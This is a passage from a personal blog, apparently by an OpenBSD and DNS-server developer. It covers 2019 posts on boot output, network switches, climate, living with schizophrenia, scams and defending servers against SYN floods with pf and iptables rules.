gem0 at pci6 dev 15 function 0 "Apple K2 GMAC" rev 0x00: irq 41, address 00:0d:93:4e:ab:48
brgphy0 at gem0 phy 1: BCM54K2 10/100/1000baseT PHY, rev. 0
ppb4 at pci1 dev 5 function 0 "Apple U3" rev 0x00
pci7 at ppb4 bus 4
pciide0 at pci7 dev 12 function 0 "ServerWorks K2 SATA" rev 0x00: DMA
pciide0: using irq 0 for native-PCI interrupt
pciide0: port 0: 1.5Gb/s
wd0 at pciide0 channel 0 drive 0:
wd0: 16-sector PIO, LBA48, 305245MB, 625142448 sectors
wd0(pciide0:0:0): using PIO mode 4, Ultra-DMA mode 6
pciide0: port 1: 1.5Gb/s
wd1 at pciide0 channel 1 drive 0:
wd1: 16-sector PIO, LBA48, 76319MB, 156301488 sectors
wd1(pciide0:1:0): using PIO mode 4, Ultra-DMA mode 6
pciide0: port 2: PHY offline
pciide0: port 3: PHY offline
uhidev0 at uhub3 port 1 configuration 1 interface 0 "Logitech USB Optical Mouse" rev 2.00/43.01 addr 2
uhidev0: iclass 3/1
ums0 at uhidev0: 3 buttons, Z dir
wsmouse0 at ums0 mux 0
uhub5 at uhub4 port 2 configuration 1 interface 0 "Macally Macally iKey" rev 1.10/0.01 addr 2
uhidev1 at uhub5 port 1 configuration 1 interface 0 "Macally Macally iKey" rev 1.10/0.01 addr 3
uhidev1: iclass 3/1
ukbd0 at uhidev1: 8 variable keys, 6 key codes
wskbd0 at ukbd0: console keyboard, using wsdisplay0
uhidev2 at uhub0 port 1 configuration 1 interface 0 "Apple Computer HID-proxy" rev 1.10/12.41 addr 2
uhidev2: iclass 3/1
ukbd1 at uhidev2: 8 variable keys, 6 key codes
wskbd1 at ukbd1 mux 1
wskbd1: connecting to wsdisplay0
uhidev3 at uhub0 port 1 configuration 1 interface 1 "Apple Computer HID-proxy" rev 1.10/12.41 addr 2
uhidev3: iclass 3/1
ums1 at uhidev3: 5 buttons
wsmouse1 at ums1 mux 0
vscsi0 at root
scsibus2 at vscsi0: 256 targets
softraid0 at root
scsibus3 at softraid0: 256 targets
bootpath: /ht/pci@5/k2-sata-root/k2-sata@1/disk@0:/bsd
root on wd1a swap on wd1b dump on wd1b
WARNING: clock gained 61 days -- CHECK AND RESET THE DATE!
The string "ppb1 at pci3 dev 4 function 0 "Pericom PI7C21P100 PCIX-PCIX" rev 0x01" indicates that it's a 133 MHz bridge as shown here. So that answers my questions
from last article. What's weird is that I must update the wikipedia entry as
it's wrong here.
In my office there is no 10 GbE switch so I needed one and one that can
aggregate ports. So I got another one of those Netgear GS110EMX switches.
Here is a diagram of what I intend to do with it:
As you can see I'm going for speeds of 10, 4, (2 out of picture) and 1 GbE.
Hopefully the new aggr(4) device on OpenBSD will work for this. I think I
already mentioned what I want to do with these speeds.
Earths new (upcoming) halo
July 23rd, 2019
This is what I envision the new halo to look like with spacex's starlink.
Basically each satellite has up to five laser links which it uses to
communicate with another starlink satellite. Usually aimed at the horizon
so we would never see it on earth. But from outer space we may see it and
it may look like the image above. It would draw a halo around earth or a
ring, in the colour of the laserlight used (red, green, blue?). Should be
interesting seeing it from the moon.
Happy 127th Ras Tafari Makonnen
July 23rd, 2019
Today His Imperial Majesty would be 127 years old. Thanks for all the songs!
Got the switch, and a little disappointed at the quad card
July 24th, 2019
I got the switch. It's performing as should after I upgraded its firmware.
Only the bandwidth on iota sucks. I could only get 420 Mbit/s routed through
2xdual aggregated ports so 840 Mbit/s throughput on the quad card. I was
hoping for well 4x that. Now I have a nice purple quad cable 5 meters long
and it's useless. I should have known. It's the CPU that can't keep up.
The PowerPC 970FX at 1.8 Ghz (only one shown in top to have load) can only
do that much, and that's with jumbo frames at 9000 mtu. Shux.
Intend to install small solar powered CO2 scrubber
July 25th, 2019
I'm looking for solutions to buy or build a CO2 scrubber that requires
electricity from my solar panel. It shouldn't take a lot of space and
not much electricity since I have only 4 to 8 KWh's for the panel I have.
We gotta exit coal by 2022
July 25th, 2019
BBC is saying similar here. I said this back in 2017 here. Unfortunately our "Energiewende" was not fast
enough. We only produce 30 gigawatts from Solar and Wind, compared to a
72 gigawatt demand... see here. We sorta
screwed up.
There is assessments for scrubbing CO2... go for it!
July 26th, 2019
TED talk of Jennifer
Wilcox, explaining CO2 scrubbers on global scale. This we gotta do in
the very near near future. Problem is that it's a race of time to remove
CO2 from atmosphere so that frozen methane in russia and canada don't
thaw. She said it requires a powerplant the size of new jersey so that's
where we're at. Put it in the sahara desert and use solar power. This is
an absolute must. The ISS cost 150 billion $, I'd personally give twice
as much, that's how important this is. And that's just a start because it
will cost a lot more than that overall. How important do you think life
is? What's the budget or dollar value for life?
She says also that we need to reduce output of CO2. This means cars and
powerplants that pollute.
Why I don't own a car, since 1993
July 26th, 2019
There is several factors why I decided to not own a car:
I got the drive bug. Just because I could I drove everywhere, I was ashamed of this somewhat.
I had/have concentration problems back in those days making me scared of driving, it was a safety issue
I don't trust other drivers either, but surely not myself
These are the main factors. When I had my car gasoline cost 50 canadian cents
a liter. I predict that's about 50 euro cents today if you account for
inflation. It was ridiculously cheap. Today we're looking at around 1.50
EUR per liter give or take 20 cents. Owning a car is not what it was in
the 1990's and I'm sure people get the drive bug as well. It just makes no
sense to drive anymore. Use a computer.
Second heatwave of the summer is coming to an end
July 26th, 2019
Today was the third or fourth day where we had temps over 37C. But it's
almost over. We're expected to get thunderstorms tonight/tomorrow and by
monday temperatures are expected to go below 20C. Whew. How many more of
these heat spells do we have to do this year? Productivity for me was
near zero. Sleep was uncomfortable and short. There were days when I
just thought "please let this day be over soon", that's how bad it was.
My home is now WIFI-less
July 28th, 2019
I have finally cabled everything at home so that I could turn my wifi access
point off. I'm enjoying it for the time being. I still have an ipod that
requires occasional net use, but for that I can boot the OpenWRT access point
that is in the hallway (it's usual state is off though).
Above is an image of the office switch. All ports are basically used, but I
was able to offload ports from my Xeon workstation to it. I tried zzz'ing the
xeon once but the NIC does not come back after wake. So I'M thinking I may
do a nightly shutdown to save electricity. Another thing I want to do is
replace the Lanner router that I have in the living room with an APU router.
With the APU I want to put another OpenWRT router beside it when I need the
extra ports, I think though I'm gonna turn the WIFI off on it (that's a thing
one can do). So.. lots of changes happening in my house.
5 months left until Delphinusdnsd 1.4
July 28th, 2019
Delphinusdnsd this year has seen a lot of changes and refactoring. There 5
months left and I'm doing the most important work of the year for it then.
I'm making the slave/replicant dns mode happen hopefully. Hopefully we don't
get another heatspell as this would take away time from development. I'M
hoping to be done with the replicant work in december and then have 2-4 weeks
of testing. Release is at december 31st most likely.
Yes, I'm code-dyslexic
August 1st, 2019
I don't know if this is common out there, but I can't read code. I have a
very hard time concentrating on others code. This in part is why I have
started my DNS server project for example because I couldn't concentrate,
or understand the BIND code. It is an embarrassing setback to be code-dyslexic
because I rely on others to make sense of code. And others don't have the
time to re-read what I've read, to confirm what I mean.
In the past I've blamed code-dyslexia on obfuscation. But there is a more
subtle explanation. Not only do I have code dyslexia but I also have a slight
or more than slight learning disability. For example. With C code there was
very little people that taught me this. I picked up the K&R and read it. Not
just once, but many times, because I couldn't understand it the first time
through.
So, where does this leave me with Open Source code then? In a very difficult
position because whether open or not I can't really do an audit. Sure in
audits there is method that needs to apply. You just don't grab a code and
start reading it. You have to make a plan, I'm sure. In the past I've taken
people's words that code is OK to use. But lately I have more questions.
So when someoen says "read the code, it's there" that's a big obstacle for me
because I lack the concentration.
As a rule I've had "no obfuscation" at the top of my list. Comments aren't so
important because they often don't reflect reality when a dozen or so
programmers have refactored code. But the question remains, "how do I read
this code"? It's a difficult situation.
The Frankfurt train pusher
August 2nd, 2019
Difficult situation. What happened here is a few days ago a supposedly
psycho man from switzerland (with roots from Eritrea, Africa) pushed
an 8 year old and his mother off the platform as the train was pulling in.
The kid did not survive it. That this man was african is not a warning to
me. That he was psycho had to do with his background (horrible living
conditions in war-torn Eritrea), but I can attest that having lived in
Frankfurt during a psychosis that the train station there is an intimidating
place.
I have a memory of waiting for a train in Frankfurt and someone parked a
utility waggon with blinkers right in my field of view and turned the warning
blinkers on. There wasn't a reason to do this and it really annoyed me in
the state of mind I was in. I don't think I was taking medication anymore
due to running out back then, and the psychiatrist I had in Frankfurt was not
a good psychiatrist, I fell out of the security netting there so to speak.
To describe the train station in Frankfurt to you. It's a dead end train
station and trains that move in to a platform have to go out backwards. You
enter from the "front" of the station and walk down the platforms to your
train section. Before you enter the platforms there is kiosks that sell
things, and there is always a bunch of men standing against the wall of these
kiosks. They're always there.
In my psychosis I called these people the
secret police, because they weren't pick-pockets or else they would have
been dispersed but they were surely loitering if they weren't the police.
Funny how I remember it in that way. Another annoying thing in the train
station there is when announcements are made as it echos through the entire
building and it gives merit to the german saying "ich versteh nur Bahnhof"
meaning "I only understand train-station" meaning I don't understand what
they just said.
For people subjected to stress and particularily psychos like me it is a
very energy robbing time to be taking the train. Stress levels reach a
maximum I'd say whenever I take the train to a larger place like Frankfurt.
Unfortunately the train-pusher also was stressed out and I'm sure he didn't
want the kid to die. Also it's impossible to know what was said. If they
insulted him in some way then that would have been a factor for the murder.
I'm not defending him or his illness but I think you have about a 50/50
chance of bettering a situation in train stations when you have more police
presence.
I've seen Ordnungsamt (these aren't really cops they are ticketers for law
and order) staff give tickets to a young man because he had an insult written
on his jacket. That was a few levels below the train station in the S-Bahn
rapid transit platform. The guys jacket said something like "you're all
assholes" or something like that and that caused him to be ticketed with
being insulting to the public. All in all Frankfurt is an insane place and
if you want to escape the insanity you drive into it per car and avoid the
public. That's what the rich bankers do. Not very economic or green for
todays climate though.
In my opinion there is a conflict of interest regarding NATO
August 9th, 2019
In the Sueddeutsche Zeitung (german, sz.de) the USA threatens with
a re-deployment of german american troops to Poland. This can only be
welcomed in Germany I think, since it is Germanys intention to have no foreign
troops on its soil. Sure there will be jobs lost and the economy is gonna
take a slight hit, but other than that NATO troops in Germany are superfluent.
NATO itself will likely die in the next 20 years since we'll get the European
Army most likely. My reasoning to this is that Ursula von der Leyen already
said that she wants to arm the EU with an army. This is supported by Macron
and Merkel. So while the european corps are being built up, there is a COI
regarding NATO. NATO itself is irrelevant by now. What is its mission?
Surely not to keep Mr. Mao from China out of Europe in Afghanistan.
Afghanistan may be a pivot to cut China off, but it also encloses the core
islamic world. I may have said it before, but muslim countries are surrounded
by european forces (Mali, Africa to Afghanistan, to mainland Europe). Why
this is exactly I'm not even sure of.
I produce roughly 5.8 Tonnes of CO2 per year
August 11th, 2019
Not counting the food I eat, I produce about 5.8 Tonnes of CO2 per year
with 11,000 KWh's
(estimated) for heating, cooling and electricity. This
is calculated via this
CO2 calculator.
I compared this with my parents who rent a house and drive a car and it's a lot
less than their CO2 output.
Besides delphinusdnsd, secondary projects
August 12th, 2019
One problem with life is that there is not enough time to persue all things
that one wants to do. Here is my list of secondary projects that I have
started or would like to do other than delphinusdnsd:
powerpc64 port, porting OpenBSD to the PowerMAC G5 64-bit
kismet_drone doesn't work on my 841Nv10 access point I'd like to write a
compatible clone to kismet_drone
I'd like to write a fetchmail clone that does some things better
These are the things I'm doing on the side or hoping/thinking of doing.
Laniakea and the great attractor
August 13th, 2019
In conversation on IRC today I likened the universe like a prairie grass.
Going back to youtube I then re-found this good
clip (youtube.com) 4 min.
Enjoy.
RIP MrBill
August 16th, 2019
The news has reached me that mrbill died. Sad. 1990's Efnet IRC is where
we all sat and chatted. Best of times! You can compare now with then and
back then everyone was just ok. I'm sure someone has logs of those days,
but it was one thing to read logs and another to have a socket connected and
view things in real time.
Ice Polar caps an endangered thing
August 18th, 2019
Slashdot turned off it's anonymous coward posting so I'm posting this here.
Elon wake up! Polar caps endangered.
EuroBSDCon 2019 in Lillehammer, Norway
August 18th, 2019
In almost exactly one month is Eurobsdcon in beautiful Norway. Unfortunately
I won't be going. But I recommend anyone who thinks they are somewhat good
with the BSD's to go meet the people that frequent BSDCon's. A lot can still
be learned, and getting together in Norway makes a nice setting.
A week of synfloods
August 24th, 2019
Since about the 16th I've noticed a subtle synflood emanating from up to
160 /24's on mostly cloud providers. For the last day or so this has gone
down to a trickle and I assume it's only testing the water or so.
I learned a lot about netfilter and pf this week. For one in pf when you
do a os fingerprinting there is no statistics in a pfctl -srules -vv on
fingerprinted packets. Finally I applied the synproxy rules on my openbsd
servers with:
pass in quick on em0 proto tcp from any to $kite_ip port { 53 } synproxy state
On Linux the story is a bit different. At first I applied the hosts that were
synflooding me with a small script, such as this:
#!/bin/sh
netstat -na | awk '/SYN_REC/ {print $5}' | awk -F: '{a = split($1, b, "."); prin
tf("%s.%s.%s.0/24\n", b[1], b[2], b[3]); }' | sort -u |\
while read i; do
iptables -L -v -n | awk '{ print $8 }' | grep -q $i
if [ $? -eq 1 ]; then
iptables -A SYNNERS --proto tcp -s $i --dport 53 -j DRO
P
iptables -A SYNNERS --proto tcp -s $i --dport 80 -j DRO
P
iptables -A SYNNERS --proto tcp -s $i --dport 443 -j DR
OP
fi
done
exit 0
But that can only go so far, then I analysed the SYNflood packets closer,
immediately I realized that the window size was 29200 bytes. This is the
window size of some Linux'es. But they differ in that this synflood did not
apply any options (making it a 1st generation exploit), making it easy to
filter. I have made another script to install the filters:
iptables -F INPUT
iptables -F NORMALIP
iptables -A INPUT --proto tcp --dport 53 -m u32 --u32 "0&0x0f000000>>24=5" -j NO
RMALIP
iptables -A NORMALIP --proto tcp --dport 53 -m u32 --u32 "0&0x000000ff=0x28 && 3
2&0x0000ffff=0x7210" -j DROP
iptables -A INPUT --proto tcp --dport 53 --j SYNNERS
What the first u32 rule does is it finds "normal" IPv4 headers that don't have
options, (and are thus) of 20 bytes length. This allows it to traverse into
the NORMALIP table where IP length of 40 bytes is checked and the window size
of 29200 bytes. For most Linux'es that use a win size of 29200 bytes this is
ok because they add the TCP MSS option on SYN when connecting, thus increasing
their IP length beyond 40 bytes.
While this was a great way to spend time with colleagues and friends on IRC
(because they had synfloods as well), I got little delphinusdnsd programming
done this week (which I had originally planned). Oh well.. maybe next week!
As far as the synflooder it's hard to know what it is. I suspect it's a worm
that uses spectre to break into other cloud hosts and then installs a syn-
flooder. But it's only a guess.
Safari is scary
August 24th, 2019
I was browsing Wetter.com for the weather stats and it automatically downloaded
something (a supposed anti-virus) in my Downloads directory. I'm reinstalling
my Mac OS come Monday. What a PITA (pain in the ass). Oh yes I immediately
turned off javascript.
Downtime on centroid.eu
August 27th, 2019
Sorry for any inconvenience this has caused. The server went down at 9:47AM and was restored at 12:49PM in the afternoon, a three hour outtage.
Longer outtage on centroid.eu
August 28th, 2019
I just restored the computer, the provider put new RAM in it. Let's hope it
stays up now. Sorry for the inconvenience according to my records the box
was down since 9:01PM yesterday.
Server replaced after a 48 hour downtime
August 29th, 2019
My provider has replaced the server (except harddrives). I am so sorry for
the downtime, but we have more RAM now and overall a speedier server.
Hopefully the problem was not software related, but we couldn't even get on
console of the old one it was frozen up every time. Time will tell.
I shaved my beard off
August 29th, 2019
Today I got shaving foam and razor at the supermarket. Then in the late
morning I shaved it all off. There is a red area on my chin, I may have
to seek a skin doctor if this doesn't naturally go away. It was probably
the area that I had dandruff on. It won't be snowing on my shirts anymore.
September Equinox in exactly three weeks
September 2nd, 2019
Equinox is upon us again in 3 weeks. The sun will be aligned with the equator
then and is moving towards the tropic of capricorn. Of course it's not the
sun moving but the tilt of the earth in relation to the sun. Finally cooler
weather! In one month or thereabouts I'm turning on the heat again.
Last year the
heat was turned on on October 2nd, 2018. We'll see when it will be this
year. The September Equinox is also the first day of autumn in the northern
hemisphere and the first day of spring in the southern hemisphere.
Taking a holiday from habits
September 6th, 2019
I'm taking a holiday from Internet Relay Chat until the foreseeable future.
I should be back the first week of October or so. I have been doing this in
the past too, and it was often worthwhile. At first it's boring but then
one picks up on other things, and that's my intention. I really need to be
working on delphinusdnsd programming.
Considering buying a Purism Librem 5 Phone
September 9th, 2019
I have never had a cell phone of the smartphone kind, other than an iPod which
doesn't have GPS or a phone function. Pressures are making it hard not to have
a cell phone, so I'm thinking of getting this phone. Here is it's
website. I was also interest-
ed in the pinephone, but that one doesn't have an aluminium case. I'll wait
four days before making a purchase. Toll and customs will make this phone a
lot more expensive than it currently is.
Thought of getting a new monitor, but what I really need...
September 10th, 2019
Is a KVM switch. I have found one on amazon and will wait a week until
I make the purchase (at least). With a 4 port KVM switch I'm freeing up
2 monitors and keyboards and those can be reused for more important deeds.
I don't need 4 monitors really as currently I have 3 for myself.
Odd DNS packetry
September 10th, 2019
I received a DNS malformed packet log from a Hong Kong IP.
Sep 10 08:37:38 kite delphinusdnsd[80672]: on descriptor 12 interface \
"5.9.87.75" malformed question from 14.192.7.3, drop
Since there was no associated log with this it must have come from one of two
NULL returns from build_question() in delphinusdnsd. I have since given those
returns a log. In particular the question had a TSIG tag which was in some
form malformed, either in the algorithm name or key name. Heads up to any
other DNS programmers (like BIND, which I tried to examine but failed due to
code-dyslexia) that there is such packets out there. The fact that these
expand_compression() functions failed after being called from build_question().
The extra logging, that I have added, is done
here.
On average there is one domain for every 10 netizens, roughly
September 10th, 2019
Wolfram Alpha has answered me that there is 3.613 billion internet users.
I looked this up because I saw that there is
354.7 million internet domains.
These are interesting figures. We are a far cry for everyone having their own
internet domain name. I personally have around seven domains but this will
half roughly next year as I'm tightening my belt.
I like it when it's cooler
September 10th, 2019
I'm feeling almost in my element. I'm wearing a hooded sweatshirt and this
is the most comfortable mode. I still haven't turned on the heat. Hopefully
later in October I'll turn it on.
Delphinusdns.ORG now has it's own blog!
September 11th, 2019
I have ported this blog over to delphinusdns.org. Any news regarding the
daemon will likely be written there from now on.
Sirens - only a drill
September 12th, 2019
Today I read in the mainpost newspaper, the sirens will sound (not sure the
time, probably before/at 11AM). It is only a drill in all of lower franconia.
One should be aware of this. Thank you mainpost.
Happy Friday the 13th
September 13th, 2019
Hopefully you're not superstitious. There is one more F13 coming up this
year in december, and next year there is one in march and november. Cheers!
Why does it take...
September 13th, 2019
an amateur with a small inexpensive telescope to identify interstellar
comets? Aren't we funding some sort of astronomy operation in europe
anyhow? Speaking of telescopes and astronomy, I'm against the TMT, the
thirty meter telescope. It was supposed to be planted on top of Mauna
Kea on holy land. The Polynesians have won my heart. Place the TMT elsewhere.
There is plenty, albeit inferior, locations. Matter of fact. Let's rethink
astronomy entirely. Rockets are cheaper than they were in the days of the
space shuttle, place more telescopes in space and foreign bodies such as
the Moon and Mars. With all these satellites that will encircle the earth
in the next 10 years astronomy won't be fun anymore anyhow. Yes to the
James Webb space telescope, and yes to any future Hubbles they won't be
affected by space junk around earth if placed on further out orbits.
Is it just me...
September 14th, 2019
Or is browsing for quality books becoming really hard on Amazon.com? I am
interested in anything that uplifts me in my hobbies and profession. I can't
find much. Why is this exactly?
Well that's that, no libra for me
September 14th, 2019
I was telling people I know that I may be making a facebook comeback, if, and
only if the libra crypto currency turns out to be fruitful. Now there
word that
germany and france are blocking libra. So that's that. I may be missing
out on freedom here, prove to me that this isn't a control scheme by germany
and france and not a "keep you safe" scheme. I'm quite discontent with what
the country here in Germany is doing for me. They require a stupid 2FA app
that I have to use on my ipod to purchase something with CC online. How
stupid! The CC companies are laughing all the way to the bank as they are
now able to close their fraud departments to a bare minimum.
10 days no IRC, more work ahead
September 16th, 2019
I'm getting a bit of cravings, I miss my IRC friends. I want to chat again.
My dreams involve some of these friends (one backstabbing me, with a syringe).
I think I'm at a point where I should go back, OR hold out 2 more weeks to
beat the cravings. It's fair to say I am/was an IRC addict. I knew this all
along as I used the IRC addiction to overcome my MUD (also MUDD) addiction
way back in 1996. Back then the rumours were that MUD is "cyber crack", it
was a very emotional game. The MUD I played I'm not going to reveal in this
article, but those people were all very good people, so I'm not gonna talk
about it.
IRC is a chat service for old-time chatters. Even though back in the days
there was "room-chats" this is very old, one of the oldest chat protocols
and networks there is. I use EFnet which stands for "eris free network".
Eris is the greek god of disharmony I think, although I could be mistaken. It
has to do with chaos anyhow. I just looked it up on wikipedia, it is the
god of discord which yeah
does fit in with disharmony as explained here.
Before I left, and this helped in my decision to take a break, someone accused
me of being racist. There is not much one can do about the accusation, it is
an unfair accusation. But it's an accusation a 40 year old+ white male will
face at least once in their lifetime I'm sure. I'm just upset that I will have
to face that person over this again. I can't run from this, but I cannot
disprove that I'm racist. I hate these detriments. I wish the human experience
would be a little less accusing. I often feel accused or judged. But it's not
really your business so I'll leave it at that. Just running off my mouth.
So I'm pausing a little to catch my thoughts, looking at the definition of
Eris. In Biology Eris is a spider, this also fits with efnet. As it's a
spidernet-like mesh. If for example you send someone a private message, the
network will route your message to all nodes (afaik) until the intended person
receives this. But this is all theory to me. I don't really know how private
messages work. If someone writes a message to another person it's possible
that somewhere along the network a node is not encrypted that intelligence
services can gobble up these messages. So that's that. IRC is probably
the protocol that is most watched over by algorithms of the deep state. If
not then one can assume it's a safe protocol. But I personally doubt it.
September Equinox in exactly one week
September 16th, 2019
I guess it's a countdown. I already blogged about this
from three weeks out. And I'll likely say something
again a few days before, and on day of.
Does MINT include UNIX?
September 16th, 2019
MINT is a german abbreviation for "Mathematik, Ingenieurwesen,
Naturwissenschaften und Technik", so translated Math, Engineering, Natural
Sciences and Technology. It is a catch phrase in HR departments that want
someone from this branch, which I guess would include Internet Technology (IT).
What I'm wondering is if MINT includes UNIX, and I'm writing this to brainstorm
around my idea. UNIX is an operating system that has been cloned by Linux and
is also a direct ancestor to the BSD branch of operating systems. There is a
lot of documentation explaining what UNIX is, so I'll keep it short. UNIX was
developed around 1970's on a teletype so everything is associated with a
shell, which is associated to a teletype, ie. written keyboard commands.
UNIX also has a graphics component called X11 aka "The X Windowing system".
X as it's also called allowed programmers to work with graphics and the first
webbrowser was likely written in X. A programmer utilizing X11 has many
hurdles to overcome. X11 programming is difficult, complex and requires a lot
of studying on top of UNIX. There really is a lot to know.
Now then, I want to stick with the UNIX shell. With a tricky command one
can show base commands/programs such that it gives a very high number:
beta$ ls /{bin,sbin,usr/bin,usr/sbin} | wc -l
669
The commands are predominantly in english and most have an associated manual
page. So I'm gonna put a small conclusion down for the reader to consider:
UNIX is memory work around many english-based commands.
Some of these commands are technical in nature. Some of these commands are
mathematical in nature. Some of these commands are based around computer
science. These commands are used (often in a hidden way) around embedded
computers in many sectors including military, medical, etc. But it's use
may not be exactly what an HR person thinks of a MINT candidate. What I'm
trying to express here is that MINT candidates may be looked upon as
mathematical geniuses but really when UNIX is included with MINT that may not
be entirely the case. You need a lot of language skills and excellent memory
as well as typing skills to run with UNIX, you can get by without being a
mathematical genius. In a lot of ways, and this may shock some, using UNIX
is a lot like being someone who knows a lot about law, and has to know how to
get to the details to completely know that law. It is not a law of nature you
need to know about.
So someone great in UNIX may not have to be a physicist,
a chemist or a biologist, or a mathematician. At a greater extension, RFC's
which are the Internet collection of requests for comments which lean heavily
on UNIX's existance, do not necessarily need you to be these traits either.
It has created an abstraction layer above these professions. Someone who is
schooled in saying "I can ping the host, I know it's up" does not need to
figure out that with the speed of light going through a fibre-optic medium
is going to be X meters per second although UNIX does give that chance indeed
by providing a round-trip time in milliseconds. You can figure out with this
round-trip time that a packet is half way to iceland or not by it's latency,
or you can just say "well it looks as always, and thus is good".
It seems to me that a lot of professionals who have a "smart" degree are pulled
into IT work and they are usually bored. There is a feeling of a clash of
ideas and lifestyles around IT folk which a physicist may not entirely be
compatible with. So I'm wondering if MINT and UNIX are truly compatible as
perhaps the (business) abstraction of UNIX may clash with a MINT person. Is it
a paradox? This is more questions.
I in no way want to put MINT, UNIX or anything else down. My background is
studying UNIX a great deal over the past 25 years, having worked with it for
profit and living, and not finding continuance in terms of a career. It pops
up every so often that I'm out of work, and constantly having to find a link
again. I find my memory is perhaps starting to fade away with age and I'm
worried of catching alzheimers, at which point Mathematical formulas, and/or
UNIX commands are for the cat anyhow. I'll keep exploring this off record
and hopefully I won't grow too frustrated with not finding the exact words
to express what I feel deep down.
Save the best for last, or, We're in a simulation
September 16th, 2019
Have you ever noticed eating pistaccios out of a bowl, that the last dozen or
so have a higher percentage of being uncrackable? By uncrackable I mean these
pistaccios's are usually closed far enough to warrant serious nail damage if
you try to open them. Is it good selection that we pick out the easy to
crack ones first? Or is it that we're in a simulation and the last few will
always be the most uncrackable ones? Things that make you go hmmmm.
Dubious Characters are asking for money door to door again
September 16th, 2019
And they are "Rotzfrech" as we'd say in german. I was accused of being
on welfare, though I'm not. And their swing from "Sie" to "Du" was incredibly
fast. The only compliment I got was the "Gruess Gott" when I opened my
door. How they got into the building is beyond me.
Dear Scammer, Cease and Desist emailing me
September 17th, 2019
The scammer that wants 300 EUR in bitcoins from me, cease and desist mailing
me. If you keep emailing me I will contact the police. This is my final
warning.
Julian Assange (political prisoner?)
September 19th, 2019
In three days I read that Julian Assange served his time for disobeying the
law, by checking into the Ecuadorian embassy in London, and thus not showing
up to a police check as required. Currently the Judge in England
wants to keep him in prison (link in german).
One has to wonder "on what grounds"? He's
wanted in the USA, but if it's a matter of extradition then they should say
so. Otherwise Julian is a political prisoner, there is no other way to
describe his situation. Remember he's had death threats against his sole
being from people like Hillary Clinton who suggested the US should
use predator drones against Julian and wikileaks.
Be aware of scams
September 19th, 2019
For a long time now I have gotten periodic and fake invoices for domains that
I have running on a web daemon. Beware of scams. Once you register a domain
at your registrar, that domain is yours and you can do with it as you please.
I chose to run my own webserver so I don't have to pay any web server invoices
other than the hardware that I have. The invoices are thus preposterous.
I own the domain(s). Just another intimidation scam by people who have done
nothing but send you a fake invoice. Don't fall for it.
An example scam invoice
September 20th, 2019
Also called SEO Spam, I have blanked out the relevant parts that are the
particular domains involved.
If the person(s) responsible for these emailings is reading this I ask you to
cease and desist as well. The domains in question aren't yours, at no time
was any service ever asked from you. Just go away.
September Equinox in three days
September 20th, 2019
I will give another notice when it's the day of.
Living with Schizophrenia: watching other Schizophrenics on youtube
September 20th, 2019
Now that I'm not IRC'ing so often, I have taken up to watching more youtube
and the fact that Samsung has fixed their youtube app, I'm able to do it on
the big screen TV. There is a lot of old footage on youtube and that's fairly
saddening. I came across MK Ultra stuff as well on youtube and I'm glad that
there is no "people experiments" like this anymore, although I have been
warned decades ago that this is still ongoing in the world. In fact my
original psychosis I thought there was a high chance that someone poisoned
me with LSD, or hypnotised me, or both. It's too late now to test blood
or try to do anything about it now, it's been 17 years.
I do watch two particular young women that have schizophrenia sometimes. If
you youtube "schizophrenia" they will likely be suggested to you. I don't
know what to make of one, sorry, the youtube name escapes me now, because she
said she had bipolar and schizoaffective, she was from Canada if I remember
right watching her complain about her first-time treatment, which is likely
also coupled with overreactions to being in a mental hospital. While I have
paranoid schizophrenia and schizoaffective. I was actually made aware that I
have been given the "paranoid" flag fairly recently. I don't sit at home
shaking and being afraid of the world though. But it's true I don't go out
for sole "enjoyment". I think it's a flag put on me to make me that much
more a danger to the society, so that there is greater acceptance to me being
committed forcefully at any point in time. In my view it's about control.
The pills are also about control, because I do know when I take them I'm an
outpatient. If I were to refuse taking the pills, I'd be an inpatient and
would see a lot worst treatment than I currently get.
Yeah well, so that's pretty much the life of a schizophrenic. You're at the
other end of the control, and can't do much about it. My apartment is a bit
messy but it's not a pig-sty, I feel I don't need to overemphasize neatness.
I recently shaved my beard off, I have the feeling that this makes me more
presentable than with a beard, which I left unkempt before. My motto was
either grow a full beard or shave it all off, and now I'm at a point where
it's all off. The beard-dandruff which was skin peeling off my chin is gone
too, much to my joy as I don't have snow on my shirts when I look down.
So I recently saw my psychiatrist for the 6-8 week(ly) checkups. No complaints.
I like this psychiatrist, but it took a while getting used to her. Her
predecessor is going into retirement soon and I still see her at the doctor's
office occasionally. It's nice that she still gives me 5 seconds to say hi
and we talk a little about how my family is.
Other than that I noticed that in ML postings I occasionally have a sentence
that doesn't make sense. Since this can't be edited, it'll be memorialized
in time. Nothing I can do about it, other than taking greater care next time
in what I say and how I say it. The particular sentence was at the beginning
of a mail and I must have been going through some initial stress in trying to
formulate what I was trying to say, so it came out as incoherent writings.
Odd I know. Sometimes I look at my own writing mistakes and wonder if that
was really me writing. So this is a continuing part of my
"Living with Schizophrenia" series. You may search this blog for earlier
writings. Cheers.
I have deleted Mac OS X on my MBP
September 21st, 2019
I have put OpenBSD natively on my MacBook Pro. As I write this it dawned on me
that I forgot to do something prior but I can recover it offline. So now
spica.centroid.eu is fully trustable. I could never fully trust the Mac OS X.
I'll be mostly using it as before at my parents house on weekends. I'm very
glad that everything works that I require. It is a mid-2015 MBP. Thanks to
all those people that worked hard to make OpenBSD work on this.
Red in the morning, Sailors warning
September 22nd, 2019
This morning there was the most beautiful red morning sky. It's mostly just
yellow by now and the sun will rise in a short while beyond the buildings.
I was up early this morning configuring my OpenBSD MBP and doing an initial
backup round. The external USB3 net adapter I bought for this MBP because
I'm afraid the thunderbolt one won't work, is working out well. Also there
is a working wifi built-in to this MBP, I'll test it in a bit after this
backup.
It is day of Equinox
September 23rd, 2019
As I write this the equinox occurs in roughly 1.5 hours at 7:50AM greenwich
time. Enjoy your day as it goes into a new season!
The domain-name bug has hit again
September 24th, 2019
I'm being asked about centroid.eu, my domain name for more than 12 years.
I don't want to part with this domain name as it is my identity online, but
if I'm made an offer of great amounts of money I will probably have to go
for it. In the meantime thinking about domains I got the domain buying virus
and purchased "mainrechner.de" which is sorta like mainframe, which is the
name I wanted to call my internet cafe and book store. That went nowhere
since someone in the city of Bremen I think has a hackerspace called
mainframe. So mainrechner is comprised of two words "Main" which is the
river that Schweinfurt (my residing city) lies on (upstream from Frankfurt),
and "Rechner" which is the german word for computer. Maybe I'll start that
internet cafe some day, at which point this domain will be used probably.
The domain cost 6.78 EUR for a year at which point I'll decide whether I want
to keep it longer.
Maple Red 2019
September 27th, 2019
Psychiatric Hospitals should not be overfilled with Prisoners
September 28th, 2019
In this article (german)
(sorry I couldn't read it all due to paywall) the mainpost reports that
psychiatric hospitals such as those in Werneck and Lohr are overfilled due to
